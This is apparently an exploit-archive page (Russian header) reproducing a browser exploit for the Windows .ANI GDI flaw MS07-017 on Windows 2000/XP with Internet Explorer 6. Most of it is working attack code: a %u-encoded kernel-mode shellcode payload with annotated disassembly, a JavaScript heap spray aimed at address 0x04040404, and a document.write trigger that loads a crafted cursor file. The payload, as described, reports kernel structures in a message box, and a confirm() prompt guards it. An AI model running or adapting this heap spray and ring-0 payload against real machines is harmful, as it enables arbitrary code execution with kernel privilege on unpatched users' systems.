
Ms Windows (.ani) Gdi Remote Elevation Of Privilege Exploit (ms07-017)


MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)

Цель: Microsoft Windows

Воздействие: Выполнение произвольного кода

скачать эксплоит (архив)

Код:
<html>
<head>
<title>MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body {
	SCROLLBAR-FACE-COLOR: #000000;
	FONT-WEIGHT: normal; 
	SCROLLBAR-HIGHLIGHT-COLOR: #006600; 
	TEXT-TRANSFORM: none; 
	SCROLLBAR-SHADOW-COLOR: #000000; 
	COLOR: #339999; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	LINE-HEIGHT: normal; 
	SCROLLBAR-ARROW-COLOR: #ffffff; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	FONT-STYLE: normal; 
	FONT-FAMILY: Fixedsys; 
	SCROLLBAR-DARKSHADOW-COLOR: #006600; 
	BACKGROUND-COLOR: #000000; 
	FONT-VARIANT: normal; 
	TEXT-DECORATION: none
}
a {
	color: #33CC33;
	text-decoration: none;
}
a:hover {
	color: #00FFFF;
	text-decoration: none;	
}

-->
</style>
</head>

<body>
<p align='center'><font size='5'>MS Windows (.ANI) GDI Remote Elevation<br>
  of Privilege Exploit (MS07-017)</font></p>
<p align='center'>&nbsp;</p>
<p align='left'><strong><font color="#00FFFF">Compatibility</font></strong><br>
  All MS Windows 2000/XP without the MS07-017 patch, with IE 6 (later IE versions unverified).</p>
<p align='left'><strong><font color="#00FFFF">References</font></strong><br>
  <a href='http://www.microsoft.com/technet/security/advisory/935423.mspx' target='_blank'>http://www.microsoft.com/technet/security/advisory/935423.mspx</a> 
  <br>
  <a href="http://research.eeye.com/html/alerts/zeroday/20061106.html" target="_blank">http://research.eeye.com/html/alerts/zeroday/20061106.html</a> 
  <br>
  <a href="http://www.milw0rm.com/exploits/3688" target="_blank">http://www.milw0rm.com/exploits/3688</a> 
  <br>
  <a href="http://ivanlef0u.free.fr/?p=41" target="_blank">http://ivanlef0u.free.fr/?p=41</a> 
</p>
<p align='left'><br>
  Technique used by this exploit (C language):<br>
  -&gt; <a href="http://www.milw0rm.com/exploits/3755" target="_blank">http://www.milw0rm.com/exploits/3755 
  <br>
  </a>The same technique, with updated code:<br>
  -&gt; <a href="http://www.labo-asso.com/download/gdi_local_elevation_privilege_exploit_ms07_017.zip">http://www.labo-asso.com/download/gdi_local_elevation_privilege_exploit_ms07_017.zip</a></p>
<p align='left'>This exploit, with the payload source (nasm):<br>
  <a href="http://www.labo-asso.com/download/gdi_remote_elevation_privilege_exploit_ms07_017.zip">http://www.labo-asso.com/download/gdi_remote_elevation_privilege_exploit_ms07_017.zip</a></p>
<p align='left'>Study (in French) :<br>
  <a href="http://www.labo-asso.com/php/travaux/gdi_kernel_exploit.php" target="_blank">http://www.labo-asso.com/php/travaux/gdi_kernel_exploit.php</a></p>
<p align='left'> <strong><font color="#00FFFF">Patch</font></strong> <br>
  <a href='http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx' target='_blank'>http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx</a>
  </p>
<p><strong><font color="#00FFFF" size="4"><em>For educational only !</em></font></strong></p>
<p><font color="#00FFFF">if</font> (success) displays some kernel information
  in a MessageBox; <br>
  <font color="#00FFFF">else</font> who knows...;</p>
<p>Coded by Lionel d'Hauenens <br>
  bugs, comments,... : <a href='http://www.labo-asso.com' target='_blank'>http://www.labo-asso.com</a> 
  or <a href="http://www.labo-asso.com/forum" target="_blank">http://www.labo-asso.com/forum</a><br>
  April 20, 2007</p>
</body>
</html>

<SCRIPT language="javascript">
// MS07-017 (.ANI) kernel-mode payload, kept as a UTF-16 string: every
// %uXXXX token is one 16-bit code unit stored little-endian, so "%uE860"
// is the byte pair 60 E8. The string is appended verbatim to each
// heap-spray block below, which is why the caller counts bytes as
// payLoadCode.length * 2. The trigger that transfers control into the
// sprayed region (the cursor file 'ani.htm') is not part of this listing.
//
// What can be read straight off the bytes (decoded by hand, not executed):
//  - it opens with pushad / call $+5 / pop ebp / sub ebp,6 (GetPC); data
//    and resolved-function slots are then addressed as [ebp+0x4xx/0x5xx],
//    which is the zero-filled area further down;
//  - a ring-0 part compares FS with 0x30, reads fs:[0x124] and then
//    [eax+0x44] (the values behind the "KTHREAD"/"KPROCESS" lines of the
//    report template), reads CR0/CR2/CR3/CR4 (0F 20 C0/D0/D8/E0), and
//    returns after sti;
//  - a user-mode part walks the SEH chain from fs:[0] to its last frame,
//    masks that handler address to 64 KB and steps back 0x10000 at a time
//    until 'MZ' and 'PE\0\0' match (module base search), then resolves
//    exports by a rol-7/add hash over the export-name table;
//  - the data tail holds what look like zero-terminated lists of 32-bit
//    hashes, the length-prefixed names "user32.dll", "ntdll.dll" and
//    "gdi32.dll", a "Ring0 report" caption, and the MessageBox text with
//    "0x????????" placeholders filled by a small 8-hex-digit formatter;
//  - the last 46 bytes are a stub that appears to shift the preceding
//    0x69E bytes (= exactly the rest of this string) up to a 4-byte
//    aligned address and return (pushad; lea; and eax,3; ...; std; rep
//    movsb; cld; popad; add [esp],3; ret).
// Offsets such as fs:[0x124] and [KTHREAD+0x44] are hard-coded for the
// builds the author targeted; they do not generalise to other kernels.
// NOTE(review): never load this page outside an isolated lab host — the
// confirm() prompt that follows is the only safeguard on this page.
var payLoadCode=unescape(
// GetPC stub: pushad; call $+5; pop ebp; sub ebp,6
"%uE860%u0000%u0000%u815D%u06ED%u0000%u3100%u39C0%u9085%u0004" +
"%u0F00%uF185%u0002%uE800%u03A6%u0000%uC009%u840F%u02E4%u0000" +
"%uB5FF%u0514%u0000%uE850%u03C7%u0000%uC009%u840F%u02D0%u0000" +
"%uC789%uC031%u5450%u406A%uCB68%u0006%u8D00%u0085%u0000%u5000" +
"%uD7FF%u095B%u0FC0%uB184%u0002%u8900%u949D%u0004%uFF00%u9085" +
"%u0004%uE800%u0635%u0000%u9090%uE890%u0000%u0000%u815D%u74ED" +
"%u0000%uE800%u02E7%u0000%uC009%u840F%u0284%u0000%u95FF%u0500" +
"%u0000%u8589%u04A0%u0000%u95FF%u04FC%u0000%u8589%u04A8%u0000" +
"%u95FF%u04F0%u0000%u8589%u04A4%u0000%uB5FF%u04A4%u0000%u95FF" +
"%u04F4%u0000%u8589%u04AC%u0000%u858D%u04E4%u0000%uFF50%u5495" +
"%u0005%u0900%u0FC0%u0884%u0002%u8900%u9C85%u0004%u3100%u4FFF" +
"%u8147%uFFFF%u00FF%u0F00%uF287%u0001%u3100%u89C0%u2444%u5004" +
"%u5050%u1F68%u0F00%u5700%u95FF%u0504%u0000%uC009%uDA74%uC689" +
"%uDB31%u6A53%u8D10%uD485%u0004%u5000%u5753%u95FF%u0540%u0000" +
"%uBD81%u04D8%u0000%u0000%u0800%u3F75%u958B%u04A0%u0000%uB70F" +
"%u9C85%u0004%uC100%u04E0%uC389%uC383%u3B10%uDC9D%u0004%u7300" +
"%u0122%u8BF0%u9C9D%u0004%uC100%u10EB%u3B66%u0858%u1175%u7880" +
"%u080A%u0B75%u588B%u8304%uFEE3%u3966%u74D3%u560C%u95FF%u0508" +
"%u0000%u6DE9%uFFFF%u89FF%u98B5%u0004%u8900%uB885%u0004%u8B00" +
"%u8918%uB09D%u0004%u3100%u6AC0%u6804%u1000%u0000%u0068%u0010" +
"%u5000%u95FF%u050C%u0000%uC009%u840F%u013B%u0000%u8589%u04B4" +
"%u0000%u9D8B%u049C%u0000%u1889%u8B66%uE69D%u0004%u6600%u5889" +
"%u8D14%u119D%u0003%u8900%u3C58%u0F6A%uB5FF%u04A4%u0000%u95FF" +
"%u04F8%u0000%u858B%u04B4%u0000%uBD8B%u04B8%u0000%u0789%u3160" +
"%u50C0%uB5FF%u049C%u0000%u95FF%u0558%u0000%u8B61%uB085%u0004" +
"%u8900%uFF07%uACB5%u0004%uFF00%uA4B5%u0004%uFF00%uF895%u0004" +
"%uFF00%u98B5%u0004%uFF00%u0895%u0005%uFF00%u9CB5%u0004%uFF00" +
"%u5C95%u0005%u6800%u4000%u0000%u0068%u0010%uFF00%uB4B5%u0004" +
"%uFF00%u1095%u0005%u8D00%u1F85%u0006%u5000%uB5FF%u04BC%u0000" +
"%u1CE8%u0002%u8D00%u3585%u0006%u5000%uB5FF%u04C0%u0000%u0AE8" +
"%u0002%u8D00%u5F85%u0006%u5000%uB5FF%u04C4%u0000%uF8E8%u0001" +
"%u8D00%u7185%u0006%u5000%uB5FF%u04C8%u0000%uE6E8%u0001%u8D00" +
"%u8385%u0006%u5000%uB5FF%u04CC%u0000%uD4E8%u0001%u8D00%u9585" +
"%u0006%u5000%uB5FF%u04D0%u0000%uC2E8%u0001%u3100%u6AC0%u8D10" +
"%u689D%u0005%u5300%u9D8D%u0578%u0000%u5053%u95FF%u0528%u0000" +
"%uC031%u5450%uB5FF%u0494%u0000%uCB68%u0006%u8D00%u0085%u0000" +
"%u5000%u95FF%u0514%u0000%uC483%u8B04%u2C95%u0005%u8D00%u009A" +
"%u0001%u8900%uFCE6%u3B64%u0435%u0000%u7300%uAD19%uD039%uF276" +
"%uD839%uEE73%u468D%u89F8%u2444%u611C%uC489%u315D%uC2C0%u0018" +
// ring-0 part starts mid-line at 60 E8 (pushad; call $+5; pop ebp; sub ebp,0x318):
// mov ax,fs; cmp ax,0x30; jne; mov eax,fs:[0x124]; mov eax,[eax+0x44]; mov eax,cr0/cr2/cr3/cr4
"%uC031%uF0F7%uFACC%uE860%u0000%u0000%u815D%u18ED%u0003%u6600" +
"%uE08C%u8366%u30F8%u1575%uA164%u0124%u0000%u8589%u04C0%u0000" +
"%u408B%u8944%uBC85%u0004%u0F00%uC020%u8589%u04C4%u0000%u200F" +
"%u89D0%uC885%u0004%u0F00%uD820%u8589%u04CC%u0000%u200F%u89E0" +
"%uD085%u0004%u6100%uC031%uFB40%u60C3%u00E8%u0000%u5D00%uED81" +
"%u036D%u0000%uBD8D%u04EC%u0000%u47E8%u0000%u0900%u74C0%uFC3F" +
"%uC689%u3F83%u7400%uFF0F%u5637%u68E8%u0000%u0900%u74C0%uAB2B" +
"%uECEB%uC783%u8304%u003F%u1774%uF889%u5040%u95FF%u04EC%u0000" +
"%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD%u40C0%u4489%u1C24" +
// module-base search starts mid-line at 52 31 C0 64 8B 00: walk fs:[0] SEH chain to the
// last frame, take its handler, and eax,0xFFFF0000, step back 0x10000 until 'MZ' / 'PE\0\0'
"%uC361%uC031%uF6EB%u3152%u64C0%u008B%u108B%u7442%u8B04%uEB00" +
"%u8BF7%u0440%u0025%uFF00%u66FF%u3881%u5A4D%u0774%u002D%u0100" +
"%uEB00%u8BF2%u3C50%u3C81%u5010%u0045%u7400%u3102%u5AC0%u60C3" +
// export resolver: iterate export names, hash with rol edx,7 / add edx,eax, compare to [esp+0x28]
"%u448B%u2424%u4003%u8D3C%u1840%u408D%u8B60%u0938%u74FF%u0352" +
"%u247C%u8B24%u184F%u5F8B%u0320%u245C%uFC24%u7C49%u8B40%u8B34" +
"%u7403%u2424%uC031%uAC99%uC008%u0774%uC2C1%u0107%uEBC2%u3BF4" +
"%u2454%u7528%u8BE1%u2457%u5403%u2424%uB70F%u4A04%uE0C1%u8B02" +
"%u1C57%u5403%u2424%u048B%u0310%u2444%u8924%u2444%u611C%u08C2" +
// 8-digit hex formatter (writes '0'-'9'/'A'-'F' backwards with std), then the
// zero-filled slot area the code addresses as [ebp+0x4xx]
"%u3100%uEBC0%u60F4%u548B%u2424%u7C8B%u2824%u08B9%u0000%uFD00" +
"%u7C8D%uFF0F%uD088%u0F24%u3004%u393C%u0276%u0704%uC1AA%u04EA" +
"%uEEE2%u61FC%u08C2%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
"%u0000%u0000%u0000%u0000%u0000%u0000%u0300%u0001%u0000%u0000" +
// what look like API-name hash lists (zero-terminated), each followed by a
// length-prefixed DLL name: "\x0Cuser32.dll", "\x0Cntdll.dll", "\x0Cgdi32.dll"
"%uFFC9%u10DF%u8FDB%u9876%u6B0B%u89D2%u6B0B%u89DE%uE60F%u0B08" +
"%uE7A6%u3983%u910E%uD782%u9266%u4982%u99C0%u9291%u9FA8%uBBC6" +
"%u12C8%u9711%u0000%u0000%u750C%u6573%u3372%u2E32%u6C64%u006C" +
"%u96F2%u4C43%u854C%u4BFD%u0000%u0000%u6E0C%u6474%u6C6C%u642E" +
"%u6C6C%u0000%u0491%uA8D8%u0000%u0000%u670C%u6964%u3233%u642E" +
"%u6C6C%u0000%uD6E4%uC5C6%u62C6%u582D%uA1E8%u934B%u0000%u0000" +
// "Ring0 report" caption, then the MessageBox body: exploit title, author,
// URL, "For educational only !", KPROCESS/KTHREAD and CR0-CR4 "0x????????" slots
"%u0000%u0000%u6952%u676E%u2030%u6572%u6F70%u7472%u0000%u0000" +
"%u534D%u5720%u6E69%u6F64%u7377%u2820%u412E%u494E%u2029%u4447" +
"%u2049%u6552%u6F6D%u6574%u4520%u656C%u6176%u6974%u6E6F%u6F20" +
"%u2066%u7250%u7669%u6C69%u6765%u2065%u7845%u6C70%u696F%u2074" +
"%u4D28%u3053%u2D37%u3130%u2937%u0D0A%u6F43%u6564%u2064%u7962" +
"%u4C20%u6F69%u656E%u206C%u2764%u6148%u6575%u656E%u736E%u0D0A" +
"%u7468%u7074%u2F3A%u772F%u7777%u6C2E%u6261%u2D6F%u7361%u6F73" +
"%u632E%u6D6F%u0D0A%u0D0A%u6F46%u2072%u6465%u6375%u7461%u6F69" +
"%u616E%u206C%u6E6F%u796C%u2120%u0D0A%u0D0A%u504B%u4F52%u4543" +
"%u5353%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u4B0D%u4854" +
"%u4552%u4441%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u0A0D" +
"%u430D%u6E6F%u7274%u6C6F%u5220%u6765%u7369%u6574%u7372%u0A3A" +
"%u0A0D%u430D%u3052%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F" +
"%u430D%u3252%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u430D" +
"%u3352%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u430D%u3452" +
// alignment stub begins at 90 90 90 60 on this line: mov ecx,0x69E; lea esi,[ebp+ecx-1];
// lea edi,[esi+eax]; std; rep movsb; cld; popad; add [esp],3; ret
"%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u003F%u9090%u6090%u858D" +
"%u0000%u0000%uE083%u7403%uF718%u83D8%u04C0%u9EB9%u0006%u8D00" +
"%u0DB4%uFFFF%uFFFF%u3C8D%uFD06%uA4F3%u61FC%u0483%u0324%u90C3");

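	/**
	 * Grow `spraySlide` by repeated self-concatenation until it covers at
	 * least `spraySlideSize` bytes, then cut it to exactly that size.
	 *
	 * Sizes are in bytes with two bytes per UTF-16 code unit (the caller
	 * derives `spraySlideSize` from `heapBlockSize` minus the payload's
	 * `length * 2`), which is why the loop compares `length * 2` and the
	 * final cut uses `spraySlideSize / 2`.
	 *
	 * @param {string} spraySlide - seed pattern (e.g. a NOP slide) to repeat.
	 * @param {number} spraySlideSize - target size in bytes.
	 * @returns {string} the seed repeated and truncated to
	 *   floor(spraySlideSize / 2) code units; an empty string when the seed
	 *   is empty or the requested size is not positive.
	 */
	function getSpraySlide(spraySlide, spraySlideSize)
	{
		// An empty seed can never reach the target size — the doubling loop
		// would spin forever on 0 * 2 < size. Nothing can be built from it.
		if (spraySlide.length === 0 || spraySlideSize <= 0)
		{
			return "";
		}
		// Doubling reaches the target in O(log n) concatenations.
		var slide = spraySlide;
		while (slide.length * 2 < spraySlideSize)
		{
			slide += slide;
		}
		// substring() truncates a fractional bound, so an odd byte count
		// rounds down to whole code units.
		return slide.substring(0, spraySlideSize / 2);
	}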

    // Entry point. This <script> sits after </html> but runs synchronously
    // while the parser is still inside it, so the document.write at the end
    // appends to the still-open document rather than replacing it.
    // The confirm() prompt is the only thing between loading this page and
    // running ring-0 code on an unpatched host — do not remove it.
    if (confirm ("This exploit execute code with kernel privilege.\n"
                +"Do you want to take really this risk?  :p"))
    {
        // Heap spray: fill the heap with heapBlockSize-byte blocks, each a
        // NOP slide followed by payLoadCode, so that heapSprayToAddress
        // (0x04040404) lands inside a slide and execution falls through into
        // the payload. How control reaches that address is left to the
        // cursor file loaded at the end (presumably the crafted .ANI; it is
        // not part of this listing).
        // Reserved for the allocator's per-block header so that
        // slide + payload + header fits exactly one heapBlockSize block.
        var SizeOfHeapEntry = 0x28;
    	var heapSprayToAddress = 0x04040404;
        // JS strings are UTF-16: length * 2 gives the size in bytes.
    	var payLoadSize = payLoadCode.length * 2;
        var heapBlockSize = 0x400000;
        // 0x90 is x86 NOP; getSpraySlide() grows this seed to the slide size.
    	var spraySlide = unescape("%u9090%u9090");
    	var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapEntry);
        // NOTE(review): `01000000` has a leading zero, so in sloppy-mode JS
        // it is a legacy OCTAL literal = 262144 (0x40000), not 16777216.
        // heapBlocks therefore evaluates to ~16.00006 and the loop below
        // runs 17 times (~68 MB); with 0x01000000 it would run 13 times.
        // Left untouched because the block count is part of the spray
        // layout; note that strict mode / ES modules reject this literal.
    	var heapBlocks = (heapSprayToAddress-01000000)/heapBlockSize;
    	var memory = new Array();
        spraySlide = getSpraySlide(spraySlide,spraySlideSize);
    
        // `i` is never declared and so becomes an implicit global; kept as
        // in the original. `memory` is never read — it only keeps the
        // sprayed strings alive.
    	for (i=0;i<heapBlocks;i++)
        {
          memory[i] = spraySlide +  payLoadCode;
        }

        // Trigger: the injected stylesheet makes the browser fetch
        // 'ani.htm' as a cursor resource. That file is not in this listing.
        document.write("<HTML><BODY><style>BODY{CURSOR: url('ani.htm')}</style></BODY></HTML>");
    }
</SCRIPT>
 